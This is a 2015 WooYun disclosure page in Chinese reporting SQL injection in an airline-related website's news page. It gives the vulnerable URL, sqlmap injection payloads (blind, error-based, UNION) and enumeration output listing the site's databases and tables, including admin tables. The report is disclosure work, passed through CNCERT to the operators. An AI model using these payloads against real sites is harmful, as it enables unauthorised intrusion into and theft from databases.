当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117928

漏洞标题:某航空公司SQL注入

相关厂商:某航空公司

漏洞作者: 路人甲

提交时间:2015-06-03 12:31

修复时间:2015-07-23 08:18

公开时间:2015-07-23 08:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-03: 细节已通知厂商并且等待厂商处理中
2015-06-08: 厂商已经确认,细节仅向厂商公开
2015-06-18: 细节向核心白帽子及相关领域专家公开
2015-06-28: 细节向普通白帽子公开
2015-07-08: 细节向实习白帽子公开
2015-07-23: 细节向公众公开

简要描述:

某航空公司SQL注入

详细说明:

此处存在注射漏洞 http://www.yccas.com/news_show.asp?id=2234

漏洞证明:

Database: tempdb
[2 tables]
+------------------------------------------+
| sysconstraints |
| syssegments |
+------------------------------------------+
Database: msdb
[82 tables]
+------------------------------------------+
| RTblClassDefs |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_databases |
| log_shipping_monitor |
| log_shipping_plan_databases |
| log_shipping_plan_history |
| log_shipping_plans |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
| systasks_view |
| systasks_view |
+------------------------------------------+
Database: pubs
[14 tables]
+------------------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+------------------------------------------+
Database: yccasdata
[15 tables]
+------------------------------------------+
| MenuClass |
| about |
| admin |
| admin |
| book |
| down |
| dtproperties |
| hbdt |
| hbxx |
| info |
| link |
| piaoad |
| sbook |
| sysconstraints |
| syssegments |
+------------------------------------------+
Database: Northwind
[31 tables]
+------------------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details Extended |
| Order Subtotals |
| Orders Qry |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+------------------------------------------+


Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2234 AND 7027=7027
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=2234 AND 7870=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(106)+
CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7870=7870) THEN CHAR(49) ELSE CHAR(48) E
ND))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: id=2234 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL,CHAR(113)+CHAR(122)+CHAR(106)+CHAR(122)+CHAR(113)+CHAR(105)+CHAR(102)+CH
AR(83)+CHAR(68)+CHAR(81)+CHAR(83)+CHAR(70)+CHAR(83)+CHAR(74)+CHAR(101)+CHAR(113)
+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL
,NULL--
---
[11:30:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[11:30:26] [INFO] fetching database names
[11:30:27] [INFO] heuristics detected web page charset 'GB2312'
[11:30:27] [WARNING] the SQL query provided does not return any output
[11:30:27] [WARNING] the SQL query provided does not return any output
[11:30:27] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[11:30:27] [INFO] fetching number of databases
[11:30:27] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[11:30:27] [INFO] retrieved:
[11:30:27] [ERROR] unable to retrieve the number of databases
available databases [27]:
[*] 2010sheyanggov
[*] cqc_cansang
[*] cqc_kcjq
[*] cqc_stampol
[*] cqc_syagri
[*] cyylj
[*] gswzwj
[*] gz
[*] gz201312
[*] gzweb
[*] jiandu
[*] jiangsu
[*] jrbhdpt
[*] master
[*] model
[*] msdb
[*] newsheyang
[*] Northwind
[*] pubs
[*] syb
[*] tempdb
[*] ybzx
[*] ybzx_web
[*] yccasdata
[*] YGSalaryNet
[*] zfxxgk
[*] zfxxgksq
点到为止,未深入。证明漏洞即可。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-06-08 08:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论